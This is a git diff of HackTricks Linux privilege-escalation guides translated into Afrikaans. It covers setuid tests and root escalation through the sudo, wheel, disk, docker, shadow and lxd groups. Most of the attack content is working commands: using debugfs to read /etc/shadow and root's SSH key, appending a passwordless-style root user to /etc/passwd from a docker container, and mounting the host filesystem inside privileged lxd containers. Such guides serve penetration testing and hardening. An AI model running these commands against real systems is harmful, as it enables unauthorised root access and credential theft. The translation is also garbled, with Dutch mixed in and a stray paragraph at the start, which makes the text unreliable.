Toestemmings:** -**Compilation and Permissions:** +Wanneer jy 'n program op Linux samestel, word 'n uitvoerbare lêer geskep wat die program se kode bevat. Hierdie uitvoerbare lêer het spesifieke toestemmings wat bepaal wie die program kan uitvoer, wysig of lees. + +Die toestemmings van 'n lêer kan gesien word deur die `ls -l` opdrag uit te voer. Die uitset sal iets soos die volgende wees: + +``` +-rwxr-xr-x 1 user group 12345 Jan 1 00:00 program +``` + +Die eerste karakter in die uitset (`-` in hierdie geval) dui aan dat dit 'n lêer is. As dit 'n `d` was, sou dit 'n gids wees. Die volgende drie karakters (`rwx`) dui die toestemmings van die eienaar van die lêer aan, die volgende drie karakters (`r-x`) dui die toestemmings van die groep aan, en die laaste drie karakters (`r-x`) dui die toestemmings van ander gebruikers aan. + +Elke karakter in die toestemmingsreeks verteenwoordig 'n spesifieke toestemming: + +- `r` dui aan dat die lêer gelees kan word. +- `w` dui aan dat die lêer gewysig kan word. +- `x` dui aan dat die lêer uitgevoer kan word. + +Om die toestemmings van 'n lêer te verander, kan die `chmod` opdrag gebruik word. Byvoorbeeld, `chmod +x program` sal die uitvoerbare toestemming aan die lêer toevoeg. + +Dit is belangrik om die toestemmings van jou lêers korrek te konfigureer om die veiligheid van jou Linux-stelsel te verseker. ```bash oxdf@hacky$ gcc b.c -o /mnt/nfsshare/b; chmod 4755 /mnt/nfsshare/b ``` - -**Execution and Result:** - +**Uitvoering en Resultaat:** ```bash bash-4.2$ $ ./b uid=1000(frank) gid=99(nobody) groups=99(nobody) context=system_u:system_r:unconfined_service_t:s0 ``` +**Ontleding:** -**Analysis:** - -* `setreuid` sets both ruid and euid to 1000. -* `system` invokes bash, which maintains the user IDs due to their equality, effectively operating as frank. - -#### Case 3: Using setuid with execve -Objective: Exploring the interaction between setuid and execve. +* `setreuid` stel beide ruid en euid in op 1000. +* `system` roep bash aan, wat de gebruikers-ID's behoudt vanwege hun gelijkheid, waardoor het effectief werkt als frank. +#### Geval 3: Gebruik van setuid met execve +Doel: Verkenning van de interactie tussen setuid en execve. ```bash #define _GNU_SOURCE #include #include int main(void) { - setuid(1000); - execve("/usr/bin/id", NULL, NULL); - return 0; +setuid(1000); +execve("/usr/bin/id", NULL, NULL); +return 0; } ``` - -**Execution and Result:** - +**Uitvoering en Resultaat:** ```bash bash-4.2$ $ ./c uid=99(nobody) gid=99(nobody) euid=1000(frank) groups=99(nobody) context=system_u:system_r:unconfined_service_t:s0 ``` +**Ontleding:** -**Analysis:** - -* `ruid` remains 99, but euid is set to 1000, in line with setuid's effect. - -**C Code Example 2 (Calling Bash):** +* `ruid` bly 99, maar `euid` word ingestel op 1000, in lyn met die effek van `setuid`. +**C-kode-voorbeeld 2 (Bash aanroep):** ```bash #define _GNU_SOURCE #include #include int main(void) { - setuid(1000); - execve("/bin/bash", NULL, NULL); - return 0; +setuid(1000); +execve("/bin/bash", NULL, NULL); +return 0; } ``` - -**Execution and Result:** - +**Uitvoering en Resultaat:** ```bash bash-4.2$ $ ./d bash-4.2$ $ id uid=99(nobody) gid=99(nobody) groups=99(nobody) context=system_u:system_r:unconfined_service_t:s0 ``` +**Ontleding:** -**Analysis:** - -* Although `euid` is set to 1000 by `setuid`, `bash` resets euid to `ruid` (99) due to the absence of `-p`. - -**C Code Example 3 (Using bash -p):** +* Alhoewel `euid` deur `setuid` na 1000 ingestel word, stel `bash` `euid` terug na `ruid` (99) as gevolg van die afwesigheid van `-p`. +**C-kode-voorbeeld 3 (Met behulp van bash -p):** ```bash #define _GNU_SOURCE #include #include int main(void) { - char *const paramList[10] = {"/bin/bash", "-p", NULL}; - setuid(1000); - execve(paramList[0], paramList, NULL); - return 0; +char *const paramList[10] = {"/bin/bash", "-p", NULL}; +setuid(1000); +execve(paramList[0], paramList, NULL); +return 0; } ``` - -**Execution and Result:** - +**Uitvoering en Resultaat:** ```bash bash-4.2$ $ ./e bash-4.2$ $ id uid=99(nobody) gid=99(nobody) euid=100 ``` - -## References +## Verwysings * [https://0xdf.gitlab.io/2022/05/31/setuid-rabbithole.html#testing-on-jail](https://0xdf.gitlab.io/2022/05/31/setuid-rabbithole.html#testing-on-jail)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks af in PDF-formaat**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
diff --git a/linux-hardening/privilege-escalation/interesting-groups-linux-pe/README.md b/linux-hardening/privilege-escalation/interesting-groups-linux-pe/README.md index d5eb7fda1..6105d0cdf 100644 --- a/linux-hardening/privilege-escalation/interesting-groups-linux-pe/README.md +++ b/linux-hardening/privilege-escalation/interesting-groups-linux-pe/README.md @@ -1,25 +1,24 @@ -# Interesting Groups - Linux Privesc +# Interessante Groepe - Linux Privesc
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Sudo/Admin Groups +## Sudo/Admin Groepe -### **PE - Method 1** - -**Sometimes**, **by default (or because some software needs it)** inside the **/etc/sudoers** file you can find some of these lines: +### **PE - Metode 1** +**Soms**, **standaard (of omdat sommige sagteware dit nodig het)** binne die **/etc/sudoers**-lêer kan jy sommige van hierdie lyne vind: ```bash # Allow members of group sudo to execute any command %sudo ALL=(ALL:ALL) ALL @@ -27,95 +26,75 @@ Other ways to support HackTricks: # Allow members of group admin to execute any command %admin ALL=(ALL:ALL) ALL ``` +Dit beteken dat **enige gebruiker wat behoort tot die groep sudo of admin enigiets as sudo kan uitvoer**. -This means that **any user that belongs to the group sudo or admin can execute anything as sudo**. - -If this is the case, to **become root you can just execute**: - +Indien dit die geval is, kan jy **root word deur net die volgende uit te voer**: ``` sudo su ``` +### PE - Metode 2 -### PE - Method 2 - -Find all suid binaries and check if there is the binary **Pkexec**: - +Vind alle suid-binêre en kyk of die binêre **Pkexec** daar is: ```bash find / -perm -4000 2>/dev/null ``` - -If you find that the binary **pkexec is a SUID binary** and you belong to **sudo** or **admin**, you could probably execute binaries as sudo using `pkexec`.\ -This is because typically those are the groups inside the **polkit policy**. This policy basically identifies which groups can use `pkexec`. Check it with: - +As jy vind dat die binêre **pkexec 'n SUID-binêre** is en jy behoort aan **sudo** of **admin**, kan jy waarskynlik binêre lêers as sudo uitvoer met behulp van `pkexec`.\ +Dit is omdat dit tipies die groepe is binne die **polkit-beleid**. Hierdie beleid identifiseer basies watter groepe `pkexec` kan gebruik. Kontroleer dit met: ```bash cat /etc/polkit-1/localauthority.conf.d/* ``` +Daar sal jy vind watter groepe toegelaat word om **pkexec** uit te voer en **standaard** verskyn die groepe **sudo** en **admin** in sommige Linux-distros. -There you will find which groups are allowed to execute **pkexec** and **by default** in some linux disctros the groups **sudo** and **admin** appear. - -To **become root you can execute**: - +Om **root te word kan jy uitvoer**: ```bash pkexec "/bin/sh" #You will be prompted for your user password ``` - -If you try to execute **pkexec** and you get this **error**: - +As jy probeer om **pkexec** uit te voer en jy kry hierdie **fout**: ```bash polkit-agent-helper-1: error response to PolicyKit daemon: GDBus.Error:org.freedesktop.PolicyKit1.Error.Failed: No session for cookie ==== AUTHENTICATION FAILED === Error executing command as another user: Not authorized ``` +**Dit is nie omdat jy nie toestemmings het nie, maar omdat jy nie sonder 'n GUI gekoppel is nie**. En daar is 'n oplossing vir hierdie probleem hier: [https://github.com/NixOS/nixpkgs/issues/18012#issuecomment-335350903](https://github.com/NixOS/nixpkgs/issues/18012#issuecomment-335350903). Jy benodig **2 verskillende ssh-sessies**: -**It's not because you don't have permissions but because you aren't connected without a GUI**. And there is a work around for this issue here: [https://github.com/NixOS/nixpkgs/issues/18012#issuecomment-335350903](https://github.com/NixOS/nixpkgs/issues/18012#issuecomment-335350903). You need **2 different ssh sessions**: - -{% code title="session1" %} +{% code title="sessie1" %} ```bash echo $$ #Step1: Get current PID pkexec "/bin/bash" #Step 3, execute pkexec #Step 5, if correctly authenticate, you will have a root session ``` -{% endcode %} - -{% code title="session2" %} +{% code title="sessie2" %} ```bash pkttyagent --process #Step 2, attach pkttyagent to session1 #Step 4, you will be asked in this session to authenticate to pkexec ``` {% endcode %} -## Wheel Group - -**Sometimes**, **by default** inside the **/etc/sudoers** file you can find this line: +## Wielgroep +Soms, standaard binne die /etc/sudoers-lêer, kan jy hierdie lyn vind: ``` %wheel ALL=(ALL:ALL) ALL ``` +Dit beteken dat **enige gebruiker wat behoort tot die groep wheel enigiets as sudo kan uitvoer**. -This means that **any user that belongs to the group wheel can execute anything as sudo**. - -If this is the case, to **become root you can just execute**: - +As dit die geval is, kan jy **root word deur net uit te voer**: ``` sudo su ``` +## Skadugroep -## Shadow Group - -Users from the **group shadow** can **read** the **/etc/shadow** file: - +Gebruikers van die **skadugroep** kan die **/etc/shadow**-lêer **lees**: ``` -rw-r----- 1 root shadow 1824 Apr 26 19:10 /etc/shadow ``` +So, lees die lêer en probeer om **sommige hashe te kraak**. -So, read the file and try to **crack some hashes**. +## Disk Groep -## Disk Group - -This privilege is almost **equivalent to root access** as you can access all the data inside of the machine. - -Files:`/dev/sd[a-z][1-9]` +Hierdie voorreg is amper **gelykwaardig aan root-toegang** aangesien jy toegang het tot alle data binne-in die masjien. +Lêers: `/dev/sd[a-z][1-9]` ```bash df -h #Find where "/" is mounted debugfs /dev/sda1 @@ -124,57 +103,47 @@ debugfs: ls debugfs: cat /root/.ssh/id_rsa debugfs: cat /etc/shadow ``` - -Note that using debugfs you can also **write files**. For example to copy `/tmp/asd1.txt` to `/tmp/asd2.txt` you can do: - +Let daarop dat jy met behulp van debugfs ook **lêers kan skryf**. Byvoorbeeld, om `/tmp/asd1.txt` na `/tmp/asd2.txt` te kopieer, kan jy die volgende doen: ```bash debugfs -w /dev/sda1 debugfs: dump /tmp/asd1.txt /tmp/asd2.txt ``` +Echter, as jy probeer om lêers wat deur root besit word te skryf (soos `/etc/shadow` of `/etc/passwd`), sal jy 'n "**Permission denied**" fout kry. -However, if you try to **write files owned by root** (like `/etc/shadow` or `/etc/passwd`) you will have a "**Permission denied**" error. - -## Video Group - -Using the command `w` you can find **who is logged on the system** and it will show an output like the following one: +## Video Groep +Met die opdrag `w` kan jy **sien wie op die stelsel aangemeld is** en dit sal 'n uitset soos die volgende een toon: ```bash USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT yossi tty1 22:16 5:13m 0.05s 0.04s -bash moshe pts/1 10.10.14.44 02:53 24:07 0.06s 0.06s /bin/bash ``` +Die **tty1** beteken dat die gebruiker **yossi fisies ingeteken** is op 'n terminaal op die masjien. -The **tty1** means that the user **yossi is logged physically** to a terminal on the machine. - -The **video group** has access to view the screen output. Basically you can observe the the screens. In order to do that you need to **grab the current image on the screen** in raw data and get the resolution that the screen is using. The screen data can be saved in `/dev/fb0` and you could find the resolution of this screen on `/sys/class/graphics/fb0/virtual_size` - +Die **video groep** het toegang om die skermuitset te sien. Jy kan basies die skerms waarneem. Om dit te doen, moet jy die huidige beeld op die skerm in rou data vasvang en die resolusie kry wat die skerm gebruik. Die skerminligting kan gestoor word in `/dev/fb0` en jy kan die resolusie van hierdie skerm vind op `/sys/class/graphics/fb0/virtual_size`. ```bash cat /dev/fb0 > /tmp/screen.raw cat /sys/class/graphics/fb0/virtual_size ``` - -To **open** the **raw image** you can use **GIMP**, select the \*\*`screen.raw` \*\* file and select as file type **Raw image data**: +Om die **rou beeld** oop te maak, kan jy **GIMP** gebruik, kies die \*\*`screen.raw` \*\* lêer en kies as lêertipe **Rou beelddata**: ![](<../../../.gitbook/assets/image (287) (1).png>) -Then modify the Width and Height to the ones used on the screen and check different Image Types (and select the one that shows better the screen): +Wysig dan die Breedte en Hoogte na die waardes wat op die skerm gebruik word en kyk na verskillende Beeldtipes (en kies die een wat die skerm beter wys): ![](<../../../.gitbook/assets/image (288).png>) -## Root Group +## Root Groep -It looks like by default **members of root group** could have access to **modify** some **service** configuration files or some **libraries** files or **other interesting things** that could be used to escalate privileges... - -**Check which files root members can modify**: +Dit lyk asof **lede van die root groep** standaard toegang kan hê om sekere **dienskonfigurasie-lêers** of sekere **biblioteeklêers** of **ander interessante dinge** te wysig wat gebruik kan word om voorregte te verhoog... +**Kyk watter lêers root-lede kan wysig**: ```bash find / -group root -perm -g=w 2>/dev/null ``` +## Docker Groep -## Docker Group - -You can **mount the root filesystem of the host machine to an instance’s volume**, so when the instance starts it immediately loads a `chroot` into that volume. This effectively gives you root on the machine. - +Jy kan die **wortel lêerstelsel van die gasheer rekenaar aan 'n instansie se volume koppel**, sodat wanneer die instansie begin, dit onmiddellik 'n `chroot` in daardie volume laai. Dit gee jou effektief beheer oor die rekenaar. ```bash docker image #Get images from the docker service @@ -186,45 +155,44 @@ echo 'toor:$1$.ZcF5ts0$i4k6rQYzeegUkacRCvfxC0:0:0:root:/root:/bin/sh' >> /etc/pa #Ifyou just want filesystem and network access you can startthe following container: docker run --rm -it --pid=host --net=host --privileged -v /:/mnt chroot /mnt bashbash ``` - -Finally, if you don't like any of the suggestions of before, or they aren't working for some reason (docker api firewall?) you could always try to **run a privileged container and escape from it** as explained here: +Uiteindelik, as jy nie van enige van die voorstelle voor hou nie, of as hulle nie werk om een ​​of ander rede (docker api firewall?) nie, kan jy altyd probeer om **'n bevoorregte houer te hardloop en daaruit te ontsnap** soos hier verduidelik: {% content-ref url="../docker-security/" %} [docker-security](../docker-security/) {% endcontent-ref %} -If you have write permissions over the docker socket read [**this post about how to escalate privileges abusing the docker socket**](../#writable-docker-socket)**.** +As jy skryfregte oor die docker-socket het, lees dan [**hierdie berig oor hoe om voorregte te verhoog deur die docker-socket te misbruik**](../#writable-docker-socket)**.** {% embed url="https://github.com/KrustyHack/docker-privilege-escalation" %} {% embed url="https://fosterelli.co/privilege-escalation-via-docker.html" %} -## lxc/lxd Group +## lxc/lxd Groep {% content-ref url="./" %} [.](./) {% endcontent-ref %} -## Adm Group +## Adm Groep -Usually **members** of the group **`adm`** have permissions to **read log** files located inside _/var/log/_.\ -Therefore, if you have compromised a user inside this group you should definitely take a **look to the logs**. +Gewoonlik het **lede** van die groep **`adm`** toestemmings om **loglêers** wat binne _/var/log/_ geleë is, te **lees**.\ +Daarom, as jy 'n gebruiker in hierdie groep gekompromitteer het, moet jy beslis na die loglêers **kyk**. -## Auth group +## Auth Groep -Inside OpenBSD the **auth** group usually can write in the folders _**/etc/skey**_ and _**/var/db/yubikey**_ if they are used.\ -These permissions may be abused with the following exploit to **escalate privileges** to root: [https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2019-19520/openbsd-authroot](https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2019-19520/openbsd-authroot) +Binne OpenBSD kan die **auth** groep gewoonlik skryfregte hê in die lêers _**/etc/skey**_ en _**/var/db/yubikey**_ as dit gebruik word.\ +Hierdie toestemmings kan misbruik word met die volgende uitbuiting om **voorregte te verhoog** na root: [https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2019-19520/openbsd-authroot](https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2019-19520/openbsd-authroot)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
diff --git a/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation.md b/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation.md index 3e93f306b..25b40652a 100644 --- a/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation.md +++ b/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation.md @@ -1,27 +1,26 @@ -# lxd/lxc Group - Privilege escalation +# lxd/lxc Groep - Voorregverhoging
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-If you belong to _**lxd**_ **or** _**lxc**_ **group**, you can become root +As jy behoort tot die _**lxd**_ **of** _**lxc**_ **groep**, kan jy root word -## Exploiting without internet +## Uitbuiting sonder internet -### Method 1 - -You can install in your machine this distro builder: [https://github.com/lxc/distrobuilder ](https://github.com/lxc/distrobuilder)(follow the instructions of the github): +### Metode 1 +Jy kan hierdie distro-bouer installeer op jou rekenaar: [https://github.com/lxc/distrobuilder ](https://github.com/lxc/distrobuilder)(volg die instruksies op die github): ```bash sudo su #Install requirements @@ -39,9 +38,7 @@ wget https://raw.githubusercontent.com/lxc/lxc-ci/master/images/alpine.yaml #Create the container sudo $HOME/go/bin/distrobuilder build-lxd alpine.yaml -o image.release=3.18 ``` - -Upload the files **lxd.tar.xz** and **rootfs.squashfs**, add the image to the repo and create a container: - +Laai die lêers **lxd.tar.xz** en **rootfs.squashfs** op, voeg die prent by die repo en skep 'n houer: ```bash lxc image import lxd.tar.xz rootfs.squashfs --alias alpine @@ -56,24 +53,20 @@ lxc list lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true ``` - {% hint style="danger" %} -If you find this error _**Error: No storage pool found. Please create a new storage pool**_\ -Run **`lxd init`** and **repeat** the previous chunk of commands +As jy hierdie fout vind _**Fout: Geen stoorpoel gevind nie. Skep asseblief 'n nuwe stoorpoel**_\ +Voer **`lxd init`** uit en **herhaal** die vorige stuk bevele {% endhint %} -Finally you can execute the container and get root: - +Uiteindelik kan jy die houer uitvoer en root kry: ```bash lxc start privesc lxc exec privesc /bin/sh [email protected]:~# cd /mnt/root #Here is where the filesystem is mounted ``` +### Metode 2 -### Method 2 - -Build an Alpine image and start it using the flag `security.privileged=true`, forcing the container to interact as root with the host filesystem. - +Bou 'n Alpine-beeld en begin dit met die vlag `security.privileged=true`, wat die houer dwing om as root met die gasheer se lêersisteem te kommunikeer. ```bash # build a simple alpine image git clone https://github.com/saghul/lxd-alpine-builder @@ -84,7 +77,7 @@ sudo ./build-alpine -a i686 # import the image lxc image import ./alpine*.tar.gz --alias myimage # It's important doing this from YOUR HOME directory on the victim machine, or it might fail. -# before running the image, start and configure the lxd storage pool as default +# before running the image, start and configure the lxd storage pool as default lxd init # run the image @@ -97,36 +90,33 @@ lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursiv lxc start mycontainer lxc exec mycontainer /bin/sh ``` +Alternatiewelik [https://github.com/initstring/lxd\_root](https://github.com/initstring/lxd\_root) -Alternatively [https://github.com/initstring/lxd\_root](https://github.com/initstring/lxd\_root) - -## With internet - -You can follow [these instructions](https://reboare.github.io/lxd/lxd-escape.html). +## Met internet +Jy kan [hierdie instruksies](https://reboare.github.io/lxd/lxd-escape.html) volg. ```bash lxc init ubuntu:16.04 test -c security.privileged=true -lxc config device add test whatever disk source=/ path=/mnt/root recursive=true +lxc config device add test whatever disk source=/ path=/mnt/root recursive=true lxc start test lxc exec test bash [email protected]:~# cd /mnt/root #Here is where the filesystem is mounted ``` - -## References +## Verwysings * [https://reboare.github.io/lxd/lxd-escape.html](https://reboare.github.io/lxd/lxd-escape.html) * [https://etcpwd13.github.io/greyfriar_blog/blog/writeup/Notes-Included/](https://etcpwd13.github.io/greyfriar_blog/blog/writeup/Notes-Included/)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
diff --git a/linux-hardening/privilege-escalation/ld.so.conf-example.md b/linux-hardening/privilege-escalation/ld.so.conf-example.md index c9e7f58c0..44a4f0363 100644 --- a/linux-hardening/privilege-escalation/ld.so.conf-example.md +++ b/linux-hardening/privilege-escalation/ld.so.conf-example.md @@ -1,22 +1,22 @@ -# ld.so privesc exploit example +# ld.so privesc uitbuiting voorbeeld
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Andere manieren om HackTricks te ondersteunen: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* Als je je **bedrijf wilt adverteren in HackTricks** of **HackTricks in PDF wilt downloaden**, bekijk dan de [**ABONNEMENTSPAKKETTEN**](https://github.com/sponsors/carlospolop)! +* Koop de [**officiële PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), onze collectie exclusieve [**NFT's**](https://opensea.io/collection/the-peass-family) +* **Sluit je aan bij de** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of de [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel je hacktrucs door PR's in te dienen bij de** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
